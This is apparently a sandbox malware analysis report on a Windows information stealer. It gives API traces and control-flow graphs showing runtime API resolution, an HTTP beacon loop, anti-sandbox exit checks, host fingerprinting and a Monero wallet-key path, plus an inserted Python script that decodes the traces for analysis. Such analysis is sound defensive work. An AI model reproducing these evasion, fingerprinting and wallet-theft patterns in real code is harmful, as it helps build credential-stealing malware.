                                • GetProcAddress.KERNEL32(75AF0000,015BE338), ref: 0094A659
                                • GetProcAddress.KERNEL32(75AF0000,015BE350), ref: 0094A672
                                • GetProcAddress.KERNEL32(75D90000,015A5DF0), ref: 0094A693
                                • GetProcAddress.KERNEL32(6F9D0000,015BE2C0), ref: 0094A6B4
                                • GetProcAddress.KERNEL32(6F9D0000,015A5DD0), ref: 0094A6CD
                                • GetProcAddress.KERNEL32(6F9D0000,015BE488), ref: 0094A6E5
                                • GetProcAddress.KERNEL32(6F9D0000,015BE260), ref: 0094A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                                • Instruction ID: 91de966e16298bd3e484c94aa6f37a2f66022c045ce782f52fac566706700196
                                • Opcode Fuzzy Hash: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                                • Instruction Fuzzy Hash: 286207B5514200AFD3C8DFA8ED8996E3BF9F7CC601714851AA61DC3264DE39A8C1DB63

                                Control-flow Graph (basic blocks and edges recovered from the graph data; the rendered graph's executed/not-executed colouring is not reproduced)
                                Basic blocks:
                                • 1033: 936280-93630b call 94a7a0 call 9347b0 call 94a740 InternetOpenA StrCmpCA
                                • 1040: 936314-936318
                                • 1041: 93630d
                                • 1042: 936509-936525 call 94a7a0 call 94a800 * 2
                                • 1043: 93631e-936342 InternetConnectA
                                • 1063: 936528-93652d
                                • 1044: 936348-93634c
                                • 1045: 9364ff-936503 InternetCloseHandle
                                • 1047: 93635a
                                • 1048: 93634e-936358
                                • 1050: 936364-936392 HttpOpenRequestA
                                • 1052: 9364f5-9364f9 InternetCloseHandle
                                • 1053: 936398-93639c
                                • 1055: 9363c5-936405 HttpSendRequestA HttpQueryInfoA
                                • 1056: 93639e-9363bf InternetSetOptionA
                                • 1058: 936407-936427 call 94a740 call 94a800 * 2
                                • 1059: 93642c-93644b call 948940
                                • 1066: 9364c9-9364e9 call 94a740 call 94a800 * 2
                                • 1067: 93644d-936454
                                • 1069: 9364c7-9364ef InternetCloseHandle
                                • 1070: 936456-936480 InternetReadFile
                                • 1074: 936482-936489
                                • 1075: 93648b
                                • 1079: 93648d-9364c5 call 94a9b0 call 94a8a0 call 94a800
                                Edges: 1033->1040, 1033->1041, 1040->1042, 1040->1043, 1041->1040, 1042->1063, 1043->1044, 1043->1045, 1044->1047, 1044->1048, 1045->1042, 1047->1050, 1048->1050, 1050->1052, 1050->1053, 1052->1045, 1053->1055, 1053->1056, 1055->1058, 1055->1059, 1056->1055, 1058->1063, 1059->1066, 1059->1067, 1066->1063, 1067->1069, 1067->1070, 1069->1052, 1070->1074, 1070->1075, 1074->1075, 1074->1079, 1075->1069, 1079->1070
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                • HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009363FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0093646D
                                • InternetCloseHandle.WININET(00000000), ref: 009364EF
                                • InternetCloseHandle.WININET(00000000), ref: 009364F9
                                • InternetCloseHandle.WININET(00000000), ref: 00936503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                                • Instruction ID: 44cff992201395ad47bdee7d934bd4aa976205a06850b1e8d273f03bc709d2a2
                                • Opcode Fuzzy Hash: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                                • Instruction Fuzzy Hash: FE712E71A40218ABEB24DFA0DC49FEE7778FB84705F108198F50A6B1D0DBB56A85CF52

                                Control-flow Graph (basic blocks and edges recovered from the graph data; the rendered graph's executed/not-executed colouring is not reproduced)
                                Basic blocks:
                                • 1090: 945510-945577 call 945ad0 call 94a820 * 3 call 94a740 * 4
                                • 1106: 94557c-945583
                                • 1107: 945585-9455b6 call 94a820 call 94a7a0 call 931590 call 9451f0
                                • 1108: 9455d7-94564c call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA
                                • 1123: 9455bb-9455d2 call 94a8a0 call 94a800
                                • 1134: 945693-9456a9 call 94aad0 StrCmpCA
                                • 1138: 94564e-94568e call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800
                                • 1139: 9457dc-945844 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550
                                • 1140: 9456af-9456b6
                                • 1271: 945ac3-945ac6
                                • 1142: 9456bc-9456c3
                                • 1143: 9457da-94585f call 94aad0 StrCmpCA
                                • 1146: 9456c5-945719 call 94a820 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800
                                • 1147: 94571e-945793 call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA
                                • 1161: 945865-94586c
                                • 1162: 945991-9459f9 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550
                                • 1250: 945795-9457d5 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800
                                • 1168: 945872-945879
                                • 1169: 94598f-945a14 call 94aad0 StrCmpCA
                                • 1175: 9458d3-945948 call 94a740 * 2 call 931590 call 9452c0 call 94a8a0 call 94a800 call 94aad0 StrCmpCA
                                • 1176: 94587b-9458ce call 94a820 call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800
                                • 1198: 945a16-945a21 Sleep
                                • 1199: 945a28-945a91 call 94a8a0 call 94a820 * 2 call 931670 call 94a800 * 4 call 946560 call 931550
                                • 1274: 94594a-94598a call 94a7a0 call 931590 call 9451f0 call 94a8a0 call 94a800
                                Edges: 1090->1106, 1106->1107, 1106->1108, 1107->1123, 1108->1134, 1108->1138, 1123->1134, 1134->1139, 1134->1140, 1138->1134, 1139->1271, 1140->1142, 1140->1143, 1142->1146, 1142->1147, 1143->1161, 1143->1162, 1146->1143, 1147->1143, 1147->1250, 1161->1168, 1161->1169, 1162->1271, 1168->1175, 1168->1176, 1169->1198, 1169->1199, 1175->1169, 1175->1274, 1176->1169, 1198->1106, 1199->1271, 1250->1143, 1274->1169
                                APIs
                                  • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                  • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009456A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945857
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 009452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                                  • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 0094532F
                                  • Part of subcall function 009452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                                  • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 00945383
                                  • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 009453AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0094578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00945A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                                • Instruction ID: ced24c18dbb201631004875d677b0a25b965b4a3d7b57816d3f8fbea355d3a71
                                • Opcode Fuzzy Hash: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                                • Instruction Fuzzy Hash: 5FE1FD72950104ABDB14FBB0DC96FED737DAFD4304F508528B506671A2EF34AA49CBA2
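The three listings above (the LoadLibraryA/GetProcAddress resolver, the WinINet request routine, and the beacon loop that ends in Sleep) are easier to read once the hooked arguments are decoded. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses API-trace lines in the report's own format, decodes the WinINet constants (INTERNET_OPEN_TYPE_DIRECT, INTERNET_SERVICE_HTTP, the HttpOpenRequestA flag mask, INTERNET_OPTION_SECURITY_FLAGS, HTTP_QUERY_STATUS_CODE, the InternetReadFile chunk size, the Sleep interval) and separates GetProcAddress calls that pass a literal export name from those that pass a pointer into a buffer built at runtime. SAMPLE_TRACE is a constructed excerpt copied from the listings above (four of the 104 GetProcAddress calls, the WinINet calls and the Sleep); the constant tables are the documented wininet.h values; the function names are the example's own.

```python
import re
from collections import Counter

# Constructed sample: trace lines copied from the listings above (4 of the 104
# GetProcAddress calls, the WinINet request routine, the beacon-loop Sleep).
SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(74DD0000,015A5870), ref: 00949C2D
• LoadLibraryA.KERNEL32(015BDFA8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A03D
• GetProcAddress.KERNEL32(6F280000,015A5C10), ref: 0094A5DA
• GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 0094A5F1
• GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 0094A607
  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
• InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
• HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009363FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0093646D
• Sleep.KERNEL32(0000EA60), ref: 00945A1B
"""

# "• Func.MODULE(args), ref: ADDR"; the argument list may be absent (the report
# prints "ExitProcess.KERNEL32 ref: ...") and "Part of subcall function X:" may precede it.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
RAW32 = re.compile(r"^[0-9A-F]{8}$")  # how the report renders a raw 32-bit argument

# Documented wininet.h constants, limited to the values this trace uses.
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {  # distinct single bits, so sum(INTERNET_FLAGS) is the mask of known bits
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INTERNET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {19: "HTTP_QUERY_STATUS_CODE"}


def parse_trace(text):
    """One dict per recognised trace line; unrecognised lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args") or ""
            calls.append({"func": m.group("func"), "module": m.group("module"),
                          "args": [a.strip() for a in raw.split(",")] if raw else [],
                          "ref": int(m.group("ref"), 16)})
    return calls


def hexarg(arg):
    """Integer value of a raw hex argument, or None for '?' and string arguments."""
    return int(arg, 16) if RAW32.match(arg) else None


def decode_flags(value, table):
    """Names of the known bits set in value, high to low; leftover bits appended as hex."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    if value & ~sum(table):
        names.append(hex(value & ~sum(table)))
    return names


def describe_wininet(calls):
    """Decode the parameters that fix the shape of the HTTP beacon."""
    out = {}
    for c in calls:
        f, a = c["func"], c["args"]
        if f == "InternetOpenA":
            out["access_type"] = INTERNET_OPEN_TYPE.get(hexarg(a[1]), a[1])
        elif f == "InternetConnectA":
            out["service"] = INTERNET_SERVICE.get(hexarg(a[5]), a[5])
        elif f == "HttpOpenRequestA":
            out["verb"] = a[1]
            flags = hexarg(a[6])
            out["request_flags"] = decode_flags(flags, INTERNET_FLAGS) if flags is not None else a[6]
        elif f == "InternetSetOptionA":
            out["option"] = INTERNET_OPTION.get(hexarg(a[1]), a[1])
        elif f == "HttpQueryInfoA":
            out["query"] = HTTP_QUERY.get(hexarg(a[1]), a[1])
        elif f == "InternetReadFile":
            out["read_chunk_bytes"] = hexarg(a[2])
        elif f == "Sleep":
            out["sleep_ms"] = hexarg(a[0])
    return out


def classify_resolver(calls):
    """Split GetProcAddress calls into literal export names and raw pointers (a pointer means
    the name lived in a buffer built or decrypted at runtime rather than in the clear)."""
    literal, pointer = [], Counter()
    for c in calls:
        if c["func"] == "GetProcAddress" and len(c["args"]) == 2:
            base, name = c["args"]
            if RAW32.match(name):
                pointer[base] += 1
            else:
                literal.append((base, name))
    return {"literal_names": literal, "pointer_names_per_module": dict(pointer)}
```

Running `describe_wininet(parse_trace(SAMPLE_TRACE))` gives a direct (no proxy) HTTP connection, a GET opened with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_OPTION_SECURITY_FLAGS set on the request before HttpSendRequestA, HTTP_QUERY_STATUS_CODE read back, the body pulled in 1999-byte (0x7CF) InternetReadFile chunks, and a 60000 ms (0xEA60) Sleep between beacon-loop iterations. `classify_resolver` shows that only InternetSetOptionA and HttpQueryInfoA are resolved by a literal name; the other GetProcAddress calls in the listing pass pointers into the 0x015A0000-0x015C0000 heap region, which is why the imports are not visible in the static import table.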

                                Control-flow Graph (basic blocks and edges recovered from the graph data; the rendered graph's executed/not-executed colouring is not reproduced)
                                Basic blocks:
                                • 1301: 9417a0-9417cd call 94aad0 StrCmpCA
                                • 1304: 9417d7-9417f1 call 94aad0
                                • 1305: 9417cf-9417d1 ExitProcess
                                • 1309: 9417f4-9417f8
                                • 1310: 9419c2-9419cd call 94a800
                                • 1311: 9417fe-941811
                                • 1312: 941817-94181a
                                • 1313: 94199e-9419bd
                                • 1315: 941835-941844 call 94a820
                                • 1316: 941970-941981 StrCmpCA
                                • 1317: 9418f1-941902 StrCmpCA
                                • 1318: 941951-941962 StrCmpCA
                                • 1319: 941932-941943 StrCmpCA
                                • 1320: 941913-941924 StrCmpCA
                                • 1321: 94185d-94186e StrCmpCA
                                • 1322: 94187f-941890 StrCmpCA
                                • 1323: 941821-941830 call 94a820
                                • 1324: 9418ad-9418be StrCmpCA
                                • 1325: 9418cf-9418e0 StrCmpCA
                                • 1326: 94198f-941999 call 94a820
                                • 1327: 941849-941858 call 94a820
                                • 1342: 941983-941986
                                • 1343: 94198d
                                • 1333: 941904-941907
                                • 1334: 94190e
                                • 1339: 941964-941967
                                • 1340: 94196e
                                • 1337: 941945-941948
                                • 1338: 94194f
                                • 1335: 941926-941929
                                • 1336: 941930
                                • 1348: 941870-941873
                                • 1349: 94187a
                                • 1350: 941892-94189c
                                • 1351: 94189e-9418a1
                                • 1329: 9418c0-9418c3
                                • 1330: 9418ca
                                • 1331: 9418e2-9418e5
                                • 1332: 9418ec
                                • 1352: 9418a8
                                Edges: 1301->1304, 1301->1305, 1304->1309, 1309->1310, 1309->1311, 1311->1312, 1311->1313, 1312->1315, 1312->1316, 1312->1317, 1312->1318, 1312->1319, 1312->1320, 1312->1321, 1312->1322, 1312->1323, 1312->1324, 1312->1325, 1312->1326, 1312->1327, 1313->1309, 1315->1313, 1316->1342, 1316->1343, 1317->1333, 1317->1334, 1318->1339, 1318->1340, 1319->1337, 1319->1338, 1320->1335, 1320->1336, 1321->1348, 1321->1349, 1322->1350, 1322->1351, 1323->1313, 1324->1329, 1324->1330, 1325->1331, 1325->1332, 1326->1313, 1327->1313, 1329->1330, 1330->1313, 1331->1332, 1332->1313, 1333->1334, 1334->1313, 1335->1336, 1336->1313, 1337->1338, 1338->1313, 1339->1340, 1340->1313, 1342->1343, 1343->1313, 1348->1349, 1349->1313, 1350->1352, 1351->1352, 1352->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 009417C5
                                • ExitProcess.KERNEL32 ref: 009417D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 436e92b7d46f3b6e003d3225c86706e07b6ef6f669b301f31be3615ff0d4aba5
                                • Instruction ID: 2897857abeeea015c6d980402f0edcbf2db21a77d180e3b343ab8f3b1aea6c62
                                • Opcode Fuzzy Hash: 436e92b7d46f3b6e003d3225c86706e07b6ef6f669b301f31be3615ff0d4aba5
                                • Instruction Fuzzy Hash: F1514DB5B1420AEBDB04DFA1E994FBE77B5BF84704F108448E806A7340E774E995CB62

                                Control-flow Graph

                                • Rendered graph not reproduced; it covers the basic blocks 947500-94768e of this function (calls to GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA)
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00947542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0094760A
                                • wsprintfA.USER32 ref: 00947640
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                                • Instruction ID: 6df8380ddd4e79737687fe88f489c4c59d73ff366d631d71bf4d387c66587923
                                • Opcode Fuzzy Hash: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                                • Instruction Fuzzy Hash: 364193B1D04248ABDF10DF94DC45FEEBBB8EF48704F104199F50967280DB78AA84CBA6

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2488), ref: 009498A1
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2218), ref: 009498BA
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2428), ref: 009498D2
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2458), ref: 009498EA
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B22A8), ref: 00949903
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B9088), ref: 0094991B
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015A5910), ref: 00949933
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015A5810), ref: 0094994C
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2470), ref: 00949964
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2350), ref: 0094997C
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2380), ref: 00949995
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B2338), ref: 009499AD
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015A5790), ref: 009499C5
                                  • Part of subcall function 00949860: GetProcAddress.KERNEL32(74DD0000,015B22F0), ref: 009499DE
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 009311D0: ExitProcess.KERNEL32 ref: 00931211
                                  • Part of subcall function 00931160: GetSystemInfo.KERNEL32(?), ref: 0093116A
                                  • Part of subcall function 00931160: ExitProcess.KERNEL32 ref: 0093117E
                                  • Part of subcall function 00931110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                                  • Part of subcall function 00931110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                                  • Part of subcall function 00931110: ExitProcess.KERNEL32 ref: 00931143
                                  • Part of subcall function 00931220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                                  • Part of subcall function 00931220: ExitProcess.KERNEL32 ref: 00931294
                                  • Part of subcall function 00946770: GetUserDefaultLangID.KERNEL32 ref: 00946774
                                  • Part of subcall function 00931190: ExitProcess.KERNEL32 ref: 009311C6
                                  • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                  • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                  • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                  • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                  • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                  • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                                • Sleep.KERNEL32(00001770), ref: 00946B04
                                • CloseHandle.KERNEL32(?,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                                • ExitProcess.KERNEL32 ref: 00946B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                                • Instruction ID: a8709b4448b0e10a5c9cb066cce7401b4fcb304d34767fe2e2c25624c2dc6cca
                                • Opcode Fuzzy Hash: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                                • Instruction Fuzzy Hash: 25311C71944208AAEB08FBF0DC56FEE7778EFC4345F104518F612A2192DF706A45CBA6

                                Control-flow Graph

                                • Rendered graph not reproduced; it covers the basic blocks 946aba-946b22 of this function (calls to OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess)
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                                • Sleep.KERNEL32(00001770), ref: 00946B04
                                • CloseHandle.KERNEL32(?,00000000,?,015B90F8,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                                • ExitProcess.KERNEL32 ref: 00946B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                                • Instruction ID: 02847ab1bc493557b1bb502969db6817ca87365872493851dbb5466d7143bdd8
